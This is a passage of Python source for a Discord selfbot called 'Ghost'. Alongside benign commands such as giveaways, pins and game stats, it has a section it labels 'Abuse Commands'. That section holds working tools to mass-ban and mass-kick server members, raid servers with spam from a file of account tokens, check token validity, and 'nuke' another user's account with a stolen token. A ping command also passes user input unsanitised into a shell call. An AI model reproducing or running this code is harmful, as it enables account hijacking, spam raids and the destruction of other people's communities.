await ctx.send("This command requires a tenor API key.")
else:
data = requests.get(f"https://api.hypixel.net/punishmentstats?key={CONFIG['api_keys']['hypixel']}").json()
if __embedmode__:
embed = discord.Embed(title=f"Watchdog Stats", color=__embedcolour__)
embed.add_field(name="Total Bans", value="```" + str(data["watchdog_total"]) + "```", inline=True)
embed.add_field(name="Last Minute", value="```" + str(data["watchdog_lastMinute"]) + "```", inline=True)
embed.add_field(name="Daily Bans", value="```" + str(data["watchdog_rollingDaily"]) + "```", inline=True)
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send(f"""```ini
[ Watchdog Stats ]
Total Bans: {data['watchdog_total']}
Last Minute: {data['watchdog_lastMinute']}
Daily Bans: {data['watchdog_rollingDaily']}
# {__embedfooter__}
```""", delete_after=__deletetimeout__)
@Ghost.command(name="skin", description="Gets a MC user skin", usage="skin [MC user]", aliases=["minecaftskin", "mcskin"])
async def skin(ctx, arg):
image = requests.get(f"https://minotar.net/skin/{arg}")
imageFile = open("image.png", "wb").write(image.content)
file = discord.File("image.png", filename="image.png")
if __embedmode__:
embed = discord.Embed(color=__embedcolour__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
embed.set_image(url="attachment://image.png")
await ctx.send(file=file, embed=embed)
else:
await ctx.send(file=file)
os.remove("image.png")
@Ghost.command(name="ppin", description="Add a message to your personal pins.", usage="ppin [message id]", aliases=["personalpin", "addppin", "addpersonalpin"])
async def ppin(ctx, msgId: int):
message = await get_message(ctx, msgId)
data = json.load(open("data/personal-pins.json"))
data[msgId] = {}
data[msgId]["content"] = message.content
data[msgId]["author"] = f"{message.author.name}#{message.author.discriminator}"
json.dump(data, open("data/personal-pins.json", 'w'), sort_keys=False, indent=4)
if __embedmode__:
embed = discord.Embed(title=f"Personal Pin", color=__embedcolour__, description=f"Pinned message `{message.content}` by `{message.author.name}#{message.author.discriminator}`.")
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send(f"**📌 Personal Pin**\nPinned message `{message.content}` by `{message.author.name}#{message.author.discriminator}`.")
@Ghost.command(name="ppins", description="List all your pinned messages.", usage="ppins", aliases=["personalpins", "listppins", "ppinlist"])
async def ppins(ctx):
data = json.load(open("data/personal-pins.json"))
ppinsMsg = ""
for value in data:
content = data[value]["content"]
author = data[value]["author"]
ppinsMsg += f"\n__{value}__ :\n** **- Content : `{content}`\n** **- Author : `{author}`"
if __embedmode__:
embed = discord.Embed(title=f"Personal Pin", color=__embedcolour__, description=ppinsMsg)
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send(f"**Personal Pins**\n{ppinsMsg}")
@Ghost.command(name="ppindel", description="Delete a pin from your personal pins.", usage="ppindel [pin id]", aliases=["ppindelete", "removeppin", "deleteppin", "personalpindelete", "deletepersonalpin", "removepersonalpin"])
async def ppindel(ctx, pinId: str):
data = json.load(open("data/personal-pins.json"))
del data[pinId]
json.dump(data, open("data/personal-pins.json", 'w'), sort_keys=False, indent=4)
if __embedmode__:
embed = discord.Embed(title=f"Personal Pin", color=__embedcolour__, description=f"Delete pin `{pinId}`.")
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send(f"**Personal Pin**\nDelete pin `{pinId}`.")
@Ghost.command(name="countdown", description="Count down from a number.", usage="countdown [number]")
async def countdown(ctx, number: int):
for count in range(number, 0, -1):
await ctx.send(count)
@Ghost.command(name="countup", description="Count up from a number.", usage="countup [number]")
async def countup(ctx, number: int):
for count in range(number):
await ctx.send(count)
@Ghost.command(name="massban", description="Ban all the members in the command server.", usage="massban")
async def massban(ctx):
if __riskmode__:
try:
await ctx.message.delete()
except:
pass
bot = discum.Client(token=__token__, log=False, user_agent=get_random_user_agent())
def close_after_fetching(resp, guild_id):
if bot.gateway.finishedMemberFetching(guild_id):
print_info("Fetching complete.")
members = bot.gateway.session.guild(guild_id).members
bot.gateway.removeCommand({'function': close_after_fetching, 'params': {'guild_id': guild_id}})
bot.gateway.close()
print_info(f"Fetched a total of {len(members)} members.")
return members
def get_members(guild_id, channel_id):
print_info("Fetching members...")
bot.gateway.fetchMembers(guild_id, channel_id, keep="all", wait=1)
bot.gateway.command({'function': close_after_fetching, 'params': {'guild_id': guild_id}})
bot.gateway.run()
bot.gateway.resetSession()
return bot.gateway.session.guild(guild_id).members
members = get_members(str(ctx.guild.id), str(ctx.channel.id))
for member in members:
try:
member = await ctx.guild.fetch_member(int(member))
await member.ban()
await asyncio.sleep(1)
except:
pass
else:
if __embedmode__:
embed = discord.Embed(title=f"Abusive Commands", color=__embedcolour__, description=f"You have risk mode disabled, you cant use this command.")
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send(f"""```ini
[ Abuse Commands ]
You have risk mode disabled, you cant use this command.
# {__embedfooter__}```""", delete_after=__deletetimeout__)
@Ghost.command(name="masskick", description="Kick all the members in the command server.", usage="masskick")
async def masskick(ctx):
if __riskmode__:
try:
await ctx.message.delete()
except:
pass
bot = discum.Client(token=__token__, log=False, user_agent=get_random_user_agent())
def close_after_fetching(resp, guild_id):
if bot.gateway.finishedMemberFetching(guild_id):
print_info("Fetching complete.")
members = bot.gateway.session.guild(guild_id).members
bot.gateway.removeCommand({'function': close_after_fetching, 'params': {'guild_id': guild_id}})
bot.gateway.close()
print_info(f"Fetched a total of {len(members)} members.")
return members
def get_members(guild_id, channel_id):
print_info("Fetching members...")
bot.gateway.fetchMembers(guild_id, channel_id, keep="all", wait=1)
bot.gateway.command({'function': close_after_fetching, 'params': {'guild_id': guild_id}})
bot.gateway.run()
bot.gateway.resetSession()
return bot.gateway.session.guild(guild_id).members
members = get_members(str(ctx.guild.id), str(ctx.channel.id))
for member in members:
try:
member = await ctx.guild.fetch_member(int(member))
await member.kick()
await asyncio.sleep(1)
except:
pass
else:
if __embedmode__:
embed = discord.Embed(title=f"Abusive Commands", color=__embedcolour__, description=f"You have risk mode disabled, you cant use this command.")
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send(f"""```ini
[ Abuse Commands ]
You have risk mode disabled, you cant use this command.
# {__embedfooter__}```""", delete_after=__deletetimeout__)
@Ghost.command(name="raidjoin", description="Make all your account tokens join a server.", usage="raidjoin [delay] [invite]")
async def raidjoin(ctx, delay:int = 3, *, invite: str):
if __riskmode__:
print_info(f"Trying to join server with tokens every {delay} seconds.")
for Token in open("data/tokens.txt", "r").readlines():
Token = Token.replace("\n", "")
userAgent = get_random_user_agent()
request = requests.post(f"https://discord.com/api/v9/invites/{invite}", headers={
"Authorization": Token,
"accept": "*/*",
"accept-language": "en-US",
"connection": "keep-alive",
"cookie": f"__cfduid={os.urandom(43).hex()}; __dcfduid={os.urandom(32).hex()}; locale=en-US",
"DNT": "1",
"origin": "https://discord.com",
"sec-fetch-dest": "empty",
"sec-fetch-mode": "cors",
"sec-fetch-site": "same-origin",
"referer": "https://discord.com/channels/@me",
"TE":"Trailers ",
"User-Agent": userAgent,
"X-Super-Properties": "eyJvcyI6IldpbmRvd3MiLCJicm93c2VyIjoiRGlzY29yZCBDbGllbnQiLCJyZWxlYXNlX2NoYW5uZWwiOiJzdGFibGUiLCJjbGllbnRfdmVyc2lvbiI6IjEuMC45MDAxIiwib3NfdmVyc2lvbiI6IjEwLjAuMTkwNDIiLCJvc19hcmNoIjoieDY0Iiwic3lzdGVtX2xvY2FsZSI6ImVuLVVTIiwiY2xpZW50X2J1aWxkX251bWJlciI6ODMwNDAsImNsaWVudF9ldmVudF9zb3VyY2UiOm51bGx9"
})
if request.status_code == 200:
print_info(f"Joined successfully.")
else:
print_info("Failed to join.")
try:
print_info("Accepted guild rules.")
requests.put(f"https://discord.com/api/guilds/{request['guild']['id']}/requests/@me", headers={"Authorization": Token, "User-Agent": userAgent, "Content-Type": "application/json"}, data=json.dumps({}))
except:
print_info("Couldnt accept guild rules")
await asyncio.sleep(delay)
else:
if __embedmode__:
embed = discord.Embed(title=f"Abusive Commands", color=__embedcolour__, description=f"You have risk mode disabled, you cant use this command.")
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send(f"""```ini
[ Abuse Commands ]
You have risk mode disabled, you cant use this command.
# {__embedfooter__}```""", delete_after=__deletetimeout__)
@Ghost.command(name="tokenraid", description="Raid a server with all your account tokens.", usage="tokenraid [threads] [amount] [channel id] (message)")
async def tokenraid(ctx, threadsAmount:int, amount: int, channel_id: int = None, *, text = None):
if __riskmode__:
await ctx.message.delete()
tokens = []
for token in open("data/tokens.txt", "r").readlines():
tokens.append(token.replace("\n", ""))
def raid():
def sendMessages():
message = text
print_info("Started new thread.")
for _ in range(amount):
requests.post(f"https://discord.com/api/channels/{channel_id}/messages", headers={"Authorization": random.choice(tokens), "User-Agent": get_random_user_agent(), "Content-Type": "application/json"}, data=json.dumps({
"content": message + f" [{random.randint(1000, 9999)}]"
}))
print_info("Raid has begun.")
threads = []
for _ in range(threadsAmount):
thread = threading.Thread(target=sendMessages())
threads.append(thread)
threads[_].start()
for thread in threads:
thread.join()
print_info("Raid finished.")
Ghost.loop.create_task(raid())
else:
if __embedmode__:
embed = discord.Embed(title=f"Abusive Commands", color=__embedcolour__, description=f"You have risk mode disabled, you cant use this command.")
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send(f"""```ini
[ Abuse Commands ]
You have risk mode disabled, you cant use this command.
# {__embedfooter__}```""", delete_after=__deletetimeout__)
@Ghost.command(name="checktoken", description="Checks if a token is working.", usage="checktoken [token]", aliases=["tokencheck"])
async def checktoken(ctx, *, token):
tokens = [token]
valid = "invalid"
message = await ctx.send("Starting check, read console for more information.")
print_info("Checking the token you gave...")
for token in tokens:
request = requests.get("https://discord.com/api/users/@me/library", headers={"Authorization": token, "User-Agent": get_random_user_agent()})
if request.status_code != 200:
valid = "invalid"
print(f"{printSpaces}{fg.cGrey}[{getCurrentTime()}] {fg.cRed}[INVALID] {fg.cWhite}{token}")
else:
valid = "valid"
print(f"{printSpaces}{fg.cGrey}[{getCurrentTime()}] {fg.cGreen}[VALID] {fg.cWhite}{token}")
await message.edit(content="Check complete, read console for more information.", delete_after=__deletetimeout__)
print_info(f"Check complete, the token is {valid}.")
@Ghost.command(name="checktokens", description="Checks if your tokens are working.", usage="checktokens")
async def checktokens(ctx):
tokens = []
validTokens = []
invalidTokens = []
message = await ctx.send("Starting check, read console for more information.")
print_info("Checking your tokens has started.")
for token in open("data/tokens.txt", "r").readlines():
tokens.append(token.replace("\n", ""))
for token in tokens:
request = requests.get("https://discord.com/api/users/@me/library", headers={"Authorization": token, "User-Agent": get_random_user_agent()})
if request.status_code != 200:
invalidTokens.append(token)
print(f"{printSpaces}{fg.cGrey}[{getCurrentTime()}] {fg.cRed}[INVALID] {fg.cWhite}{token}")
else:
validTokens.append(token)
print(f"{printSpaces}{fg.cGrey}[{getCurrentTime()}] {fg.cGreen}[VALID] {fg.cWhite}{token}")
open("data/valid-tokens.txt", "w").write('\n'.join(validTokens))
open("data/invalid-tokens.txt", "w").write('\n'.join(invalidTokens))
await message.edit(content="Check complete, read console for more information.", delete_after=__deletetimeout__)
print_info("Check complete.")
print_info(f"Valid tokens: {len(validTokens)} (Saved to data/valid-tokens.txt)")
print_info(f"Invalid tokens: {len(invalidTokens)} (Saved to data/invalid-tokens.txt)")
@Ghost.command(name="wipetoken", description="Completely wipe a token.", aliases=["cleantoken"])
async def wipetoken(ctx, token):
try:
await ctx.message.delete()
except:
pass
await ctx.send("Check console for more info...", delete_after=__deletetimeout__)
def closeDms():
try:
dms = requests.get("https://discord.com/api/users/@me/channels", headers={"Authorization": token, "User-Agent": get_random_user_agent()}).json()
for dm in dms:
try:
requests.delete(f"https://discord.com/api/channels/{dm['id']}", headers={"Authorization": token, "User-Agent": get_random_user_agent()})
except:
pass
except:
pass
def leaveServers():
try:
guilds = requests.get("https://discord.com/api/users/@me/guilds", headers={"Authorization": token, "User-Agent": get_random_user_agent()}).json()
for guild in guilds:
try:
requests.delete(f"https://discord.com/api/guilds/{guild['id']}", headers={"Authorization": token, "User-Agent": get_random_user_agent()})
except:
pass
except:
pass
def removeFriends():
try:
friends = requests.get("https://discord.com/api/users/@me/relationships", headers={"Authorization": token, "User-Agent": get_random_user_agent()}).json()
for friend in friends:
try:
requests.delete(f"https://discord.com/api/users/@me/relationships/{friend['id']}", headers={"Authorization": token, "User-Agent": get_random_user_agent()})
except:
pass
except:
pass
threading.Thread(target=closeDms).start()
threading.Thread(target=leaveServers).start()
threading.Thread(target=removeFriends).start()
@Ghost.command(name="nuketoken", description="Nuke a token.", usage="nuketoken [token]", aliases=["tokennuke"])
async def nuketoken(ctx, token):
try:
await ctx.message.delete()
except:
pass
await ctx.send("Check console for more info...", delete_after=__deletetimeout__)
def themeSpammer():
themes = ["dark", "light"]
for i in range(999999999):
requests.patch("https://discord.com/api/users/@me/settings", headers={"Authorization": token, "User-Agent": get_random_user_agent(), "Content-Type": "application/json"}, data=json.dumps({
"theme": random.choice(themes)
}))
def closeDms():
try:
dms = requests.get("https://discord.com/api/users/@me/channels", headers={"Authorization": token, "User-Agent": get_random_user_agent()}).json()
for dm in dms:
try:
requests.delete(f"https://discord.com/api/channels/{dm['id']}", headers={"Authorization": token, "User-Agent": get_random_user_agent()})
except:
pass
except:
pass
def leaveServers():
try:
guilds = requests.get("https://discord.com/api/users/@me/guilds", headers={"Authorization": token, "User-Agent": get_random_user_agent()}).json()
for guild in guilds:
try:
requests.delete(f"https://discord.com/api/guilds/{guild['id']}", headers={"Authorization": token, "User-Agent": get_random_user_agent()})
except:
pass
except:
pass
def removeFriends():
try:
friends = requests.get("https://discord.com/api/users/@me/relationships", headers={"Authorization": token, "User-Agent": get_random_user_agent()}).json()
for friend in friends:
try:
requests.delete(f"https://discord.com/api/users/@me/relationships/{friend['id']}", headers={"Authorization": token, "User-Agent": get_random_user_agent()})
except:
pass
except:
pass
def createGuilds():
while True:
requests.post("https://discord.com/api/guilds", headers={"Authorization": token, "User-Agent": get_random_user_agent(), "Content-Type": "application/json"}, data=json.dumps({
"name": "EPIC GAMERS"
}))
threading.Thread(target=themeSpammer).start()
threading.Thread(target=closeDms).start()
threading.Thread(target=leaveServers).start()
threading.Thread(target=removeFriends).start()
threading.Thread(target=createGuilds).start()
@Ghost.command(name="gstart", description="Start a giveaway in the same channel", usage="gstart [duration] [winners] [prize]", aliases=["giveawaystart", "startgiveaway"])
async def gstart(ctx, duration=None, winners: int = None, *, prize=None):
if duration is not None:
if winners is not None:
if prize is not None:
if duration.endswith("m"):
duration = duration[:-1]
time = int(duration) * 60
timemins = time // 60
timepretty = f"{timemins} minute(s)"
elif duration.endswith("s"):
duration = duration[:-1]
time = int(duration)
timepretty = f"{time} second(s)"
elif duration.endswith("h"):
duration = duration[:-1]
time = int(duration) * 3600
timehrs = time // 3600
timepretty = f"{timehrs} hour(s)"
else:
if duration.endswith("s") or duration.endswith("m") or duration.endswith("h"):
duration = duration[:-1]
time = int(duration)
timepretty = f"{time} second(s)"
e = discord.Embed(
description=f"React with 🎉 to enter!\nEnds in {timepretty}\nHosted by {ctx.author.mention}",
color=__embedcolour__)
if winners >= 2:
e.set_footer(text=f"{winners} winners | Ends at")
else:
e.set_footer(text="1 winner | Ends at")
e.set_author(name=prize)
future = datetime.now() + timedelta(seconds=time)
e.timestamp = future
msg = await ctx.send("🎉 **GIVEAWAY** 🎉", embed=e)
await msg.add_reaction('\U0001F389')
await asyncio.sleep(time)
channelMsgHistory = await ctx.channel.history(limit=500).flatten()
for message in channelMsgHistory:
if message.id == msg.id:
msg = message
#running = False
if "🎉 **GIVEAWAY** 🎉" in msg.content:
entries = []
reactions = msg.reactions
for reaction in reactions:
users = await reaction.users().flatten()
for user in users:
entries.append(f"<@{user.id}>")
entries.remove(f"<@{Ghost.user.id}>")
nowinner = False
if entries != []:
nowinner = False
winnerslist = []
if winners >= 2:
for _ in range(winners):
winner1 = random.choice(entries)
winnerslist.append(winner1)
else:
winner1 = random.choice(entries)
winnerslist.append(winner1)
else:
nowinner = True
#running = True
if nowinner is True:
await ctx.send(f"A winner was not determined.\n{msg.jump_url}")
newe = discord.Embed(
description=f"A winner was not determined.\nHosted by {ctx.author.mention}",
color=0x36393F)
else:
await ctx.send("🎉 " + ', '.join(winnerslist) + f" you won **{prize}**\n{msg.jump_url}")
newe = discord.Embed(
description=', '.join(winnerslist) + f" won!\nHosted by {ctx.author.mention}",
color=0x36393F)
newe.set_author(name=prize)
if winners >= 2:
newe.set_footer(text=f"{winners} winners | Ended at")
else:
newe.set_footer(text="1 winner | Ended at")
future = datetime.now() + timedelta(seconds=time)
newe.timestamp = future
await msg.edit(content="🎉 **GIVEAWAY ENDED** 🎉", embed=newe)
#elif "🎉 **GIVEAWAY ENDED** 🎉" in msg.content:
#running = False
else:
await ctx.send(
f"❌ **Incorrect Syntax**\nTry: `{Ghost.command_prefix}gstart 30m 1 Awesome T-Shirt`")
else:
await ctx.send(f"❌ **Incorrect Syntax**\nTry: `{Ghost.command_prefix}gstart 30m 1 Awesome T-Shirt`")
else:
await ctx.send(f"❌ **Incorrect Syntax**\nTry: `{Ghost.command_prefix}gstart 30m 1 Awesome T-Shirt`")
@Ghost.command(name="gend", description="End a giveaway", usage="gend [message id]", aliases=["giveawayend", "endgiveaway"])
async def gend(ctx, id: int = None):
#running = False
msgId = ""
msgAuthorId = ""
msgContent = ""
channelMsgHistory = await ctx.channel.history(limit=500).flatten()
#print(channelMsgHistory)
for message in channelMsgHistory:
#print(message.id)
if message.id == id:
msgId = message.id
msgAuthorId = message.author.id
msgContent = message.content
msg = message
#print("Fetched Message ID: " + str(msgId))
#print("Looking for Message ID: " + str(id))
#print("Message author ID: " + str(msgAuthorId))
#print("Bot user ID: " + str(Ghost.user.id))
if msgId == id and msgAuthorId == Ghost.user.id:
if "🎉 **GIVEAWAY** 🎉" in msgContent:
#running = True
embeds = msg.embeds
for embed in embeds:
embed_dict = embed.to_dict()
entries = []
reactions = msg.reactions
for reaction in reactions:
users = await reaction.users().flatten()
for user in users:
entries.append(f"<@{user.id}>")
entries.remove(f"<@{Ghost.user.id}>")
nowinner = False
if "winners" in embed_dict['footer']['text']:
winners = embed_dict['footer']['text'].replace(" winners | Ends at", "")
elif "winner" in embed_dict['footer']['text']:
winners = embed_dict['footer']['text'].replace(" winner | Ends at", "")
prize = embed_dict['author']['name']
if entries != []:
nowinner = False
winnerslist = []
if int(winners) >= 2:
for _ in range(int(winners)):
winner1 = random.choice(entries)
winnerslist.append(winner1)
else:
winner1 = random.choice(entries)
winnerslist.append(winner1)
else:
nowinner = True
if nowinner is True:
await ctx.send(f"A winner was not determined.\n{msg.jump_url}")
newe = discord.Embed(
description=f"A winner was not determined.\nHosted by {ctx.author.mention}", color=0x36393F)
else:
await ctx.send("🎉 " + ', '.join(winnerslist) + f" you won **{prize}**\n{msg.jump_url}")
newe = discord.Embed(
description=', '.join(winnerslist) + f" won!\nHosted by {ctx.author.mention}",
color=0x36393F)
newe.set_author(name=embed_dict['author']['name'])
if int(winners) >= 2:
newe.set_footer(text=f"{winners} winners | Ended at")
else:
newe.set_footer(text=f"{winners} winner | Ended at")
newe.timestamp = datetime.now()
await msg.edit(content="🎉 **GIVEAWAY ENDED** 🎉", embed=newe)
elif "🎉 **GIVEAWAY ENDED** 🎉" in msgContent:
#running = False
await ctx.send("😔 That giveaway has already ended.")
else:
await ctx.send("That is not a giveaway.")
else:
await ctx.send("That is not a giveaway.")
@Ghost.command(name="greroll", description="Re-roll a giveaway", usage="greroll [message id]", aliases=["giveawayreroll", "rerollgiveaway"])
async def greroll(ctx, id: int = None):
#running = False
channelMsgHistory = await ctx.channel.history(limit=500).flatten()
for message in channelMsgHistory:
if message.id == id:
msg = message
if msg.author.id == Ghost.user.id:
if "🎉 **GIVEAWAY** 🎉" in msg.content:
#running = True
await ctx.send("You can't re-roll a running giveaway.")
elif "🎉 **GIVEAWAY ENDED** 🎉" in msg.content:
#running = False
embeds = msg.embeds
for embed in embeds:
embed_dict = embed.to_dict()
entries = []
reactions = msg.reactions
for reaction in reactions:
users = await reaction.users().flatten()
for user in users:
entries.append(f"<@{user.id}>")
entries.remove(f"<@{Ghost.user.id}>")
nowinner = False
if "winners" in embed_dict['footer']['text']:
winners = embed_dict['footer']['text'].replace(" winners | Ended at", "")
elif "winner" in embed_dict['footer']['text']:
winners = embed_dict['footer']['text'].replace(" winner | Ended at", "")
prize = embed_dict['author']['name']
if entries != []:
nowinner = False
winnerslist = []
if int(winners) >= 2:
for _ in range(int(winners)):
winner1 = random.choice(entries)
winnerslist.append(winner1)
else:
winner1 = random.choice(entries)
winnerslist.append(winner1)
else:
nowinner = True
if nowinner is True:
await ctx.send(f"A winner was not determined.\n{msg.jump_url}")
else:
await ctx.send("🎉 " + ', '.join(winnerslist) + f" you won **{prize}**\n{msg.jump_url}")
else:
await ctx.send("That is not a giveaway.")
else:
await ctx.send("That is not a giveaway.")
typing = False
@Ghost.command(name="typing", description="Start or stop typing.", usage="typing [start/stop]", aliases=["inftyping", "infintetyping"])
async def typing__(ctx, action = None):
global typing
if action == "start" or action == "Start":
await ctx.send("Started typing.")
typing = True
while typing is True:
async with ctx.typing():
await asyncio.sleep(1)
if typing is False:
break
elif action == "stop" or action == "Stop":
await ctx.send("Stopped typing.")
typing = False
elif action is None:
pass
@Ghost.command(name="sounds", description="Toggle Ghost notification sounds.", usage="sounds", aliases=["togglesounds", "soundstoggle"])
async def sounds(ctx):
cfg = Config.getConfig()
if cfg["sounds"]:
cfg["sounds"] = False
else:
cfg["sounds"] = True
Config.saveConfig(cfg)
await ctx.send(f"Sounds set to `{cfg['sounds']}`.")
@Ghost.command(name="notifications", description="Toggle Ghost notifications.", usage="notifications", aliases=["togglenotifications", "notificationstoggle", "togglenotifs"])
async def notifications(ctx):
cfg = Config.getConfig()
if cfg["toastnotifications"]:
cfg["toastnotifications"] = False
else:
cfg["toastnotifications"] = True
Config.saveConfig(cfg)
await ctx.send(f"Notifications set to `{cfg['toastnotifications']}`.")
@Ghost.command(name="ping", description="Ping a domain or ip address.", usage="ping [ip/domain]")
async def ping(ctx, *, dns):
message = await ctx.send("Pinging...")
output = subprocess.run(f"ping {dns}",text=True,stdout=subprocess.PIPE).stdout.splitlines()
values = "".join(output[-1:])[4:].split(", ")
minimum = values[0][len("Minimum = "):]
maximum = values[1][len("Maximum = "):]
average = values[2][len("Average = "):]
address = output[1].replace(f"Pinging {dns} [", "").replace("] with 32 bytes of data:", "")
if __embedmode__:
embed = discord.Embed(title=f"{dns} ping..", color=__embedcolour__)
embed.add_field(name="IP Address", value=f"```{address}```", inline=False)
embed.add_field(name="Minimum", value=f"```{minimum}```", inline=False)
embed.add_field(name="Maximum", value=f"```{maximum}```", inline=False)
embed.add_field(name="Average", value=f"```{average}```", inline=False)
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await message.edit(content="Pong!", embed=embed, delete_after=__deletetimeout__)
else:
await message.edit(content=f"""```ini
[ {dns} ping.. ]
IP Address: {address}
Minimum: {minimum}
Maximum: {maximum}
Average: {average}
# {__embedfooter__}
```""", delete_after=__deletetimeout__)
@Ghost.command(name="cloneserver", description="Clone a server.", usage="cloneserver", aliases=["copyserver"])
async def cloneserver(ctx):
serverName = ctx.guild.name
serverIcon = ctx.guild.icon
newGuild = await Ghost.create_guild(serverName)
print_info(f"Created new guild.")
newGuildDefaultChannels = await newGuild.fetch_channels()
for channel in newGuildDefaultChannels:
await channel.delete()
for channel in ctx.guild.channels:
if str(channel.type).lower() == "category":
try:
await newGuild.create_category(channel.name, overwrites=channel.overwrites, position=channel.position)
print_info(f"Created new category : {channel.name}")
except:
pass
for channel in ctx.guild.voice_channels:
try:
cat = ""
for category in newGuild.categories:
if channel.category.name == category.name:
cat = category
await newGuild.create_voice_channel(channel.name, category=cat, overwrites=channel.overwrites, topic=channel.topic, slowmode_delay=channel.slowmode_delay, nsfw=channel.nsfw, position=channel.position)
print_info(f"Created new voice channel : {channel.name}")
except:
pass
for channel in ctx.guild.stage_channels:
try:
cat = ""
for category in newGuild.categories:
if channel.category.name == category.name:
cat = category
await newGuild.create_stage_channel(channel.name, category=cat, overwrites=channel.overwrites, topic=channel.topic, slowmode_delay=channel.slowmode_delay, nsfw=channel.nsfw, position=channel.position)
print_info(f"Created new stage channel : {channel.name}")
except:
pass
for channel in ctx.guild.text_channels:
try:
cat = ""
for category in newGuild.categories:
if channel.category.name == category.name:
cat = category
await newGuild.create_text_channel(channel.name, category=cat, overwrites=channel.overwrites, topic=channel.topic, slowmode_delay=channel.slowmode_delay, nsfw=channel.nsfw, position=channel.position)
print_info(f"Created new text channel : {channel.name}")
except:
pass
for role in ctx.guild.roles[::-1]:
if role.name != "@everyone":
try:
await newGuild.create_role(name=role.name, color=role.color, permissions=role.permissions, hoist=role.hoist, mentionable=role.mentionable)
print_info(f"Created new role : {role.name}")
except:
pass
await ctx.send(f"Made a clone of `{ctx.guild.name}`.")
@Ghost.command(name="webhooksetup", description="Create a new server with webhooks.", usage="webhooksetup", aliases=["setupwebhooks"])
async def webhooksetup(ctx):
global __nitrowebhook__, __privnotewebhook__, __giveawaywebhook__, __ghostpingwebhook__, __friendsupdatewebhook__, __dmtypingwebhook__, __guildleavewebhook__, __selfbotwebhook__, __ticketswebhook__
iconFile = open("data/icon.png", "rb")
icon = bytes(iconFile.read())
configFile = json.load(open("config.json"))
guild = await Ghost.create_guild("Ghost Notifications", icon=icon)
newGuildDefaultChannels = await guild.fetch_channels()
for channel in newGuildDefaultChannels:
await channel.delete()
for channel in guild.text_channels:
await channel.delete()
for channel in guild.voice_channels:
await channel.delete()
for channel in guild.categories:
await channel.delete()
category = await guild.create_category_channel("Webhooks")
nitroWebhookChannel = await category.create_text_channel("nitro-sniper")
privnoteWebhookChannel = await category.create_text_channel("privnote-sniper")
giveawayWebhookChannel = await category.create_text_channel("giveaway-sniper")
ghostPingWebhookChannel = await category.create_text_channel("ghost-pings")
friendUpdatesWebhookChannel = await category.create_text_channel("friend-updates")
dmTypingWebhookChannel = await category.create_text_channel("dm-typing")
guildLeaveWebhookChannel = await category.create_text_channel("guild-leave")
selfbotsWebhookChannel = await category.create_text_channel("selfbots")
ticketsWebhookChannel = await category.create_text_channel("tickets")
nitroWebhook = await nitroWebhookChannel.create_webhook(name="Ghost Nitro Sniper")
privnoteWebhook = await privnoteWebhookChannel.create_webhook(name="Ghost Privnote Sniper")
giveawayWebhook = await giveawayWebhookChannel.create_webhook(name="Ghost Giveaway Sniper")
ghostPingWebhook = await ghostPingWebhookChannel.create_webhook(name="Ghost Pings")
friendUpdatesWebhook = await friendUpdatesWebhookChannel.create_webhook(name="Friend Updates")
dmTypingWebhook = await dmTypingWebhookChannel.create_webhook(name="DM Typing")
guildLeaveWebhook = await guildLeaveWebhookChannel.create_webhook(name="Guild Leave")
selfbotsWebhook = await selfbotsWebhookChannel.create_webhook(name="Selfbots")
ticketsWebhook = await ticketsWebhookChannel.create_webhook(name="Tickets")
__nitrowebhook__ = nitroWebhook.url
__privnotewebhook__ = privnoteWebhook.url
__giveawaywebhook__ = giveawayWebhook.url
__ghostpingwebhook__ = ghostPingWebhook.url
__friendsupdatewebhook__ = friendUpdatesWebhook.url
__dmtypingwebhook__ = dmTypingWebhook.url
__guildleavewebhook__ = guildLeaveWebhook.url
__selfbotwebhook__ = selfbotsWebhook.url
__ticketswebhook__ = ticketsWebhook.url
configFile["webhooks"]["nitro"] = __nitrowebhook__
configFile["webhooks"]["privnote"] = __privnotewebhook__
configFile["webhooks"]["giveaway"] = __giveawaywebhook__
configFile["webhooks"]["ghostping"] = __ghostpingwebhook__
configFile["webhooks"]["friendsupdate"] = __friendsupdatewebhook__
configFile["webhooks"]["dmtyping"] = __dmtypingwebhook__
configFile["webhooks"]["guildleave"] = __guildleavewebhook__
configFile["webhooks"]["selfbot"] = __selfbotwebhook__
configFile["webhooks"]["tickets"] = __ticketswebhook__
json.dump(configFile, open("config.json", "w"), sort_keys=False, indent=4)
if __embedmode__:
embed = discord.Embed(title="Webhook Setup", description=f"Created a new guild for your webhooks called `{guild.name}`.", colour=__embedcolour__)
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send(f"Created a new guild for your webhooks called `{guild.name}`.", delete_after=__deletetimeout__)
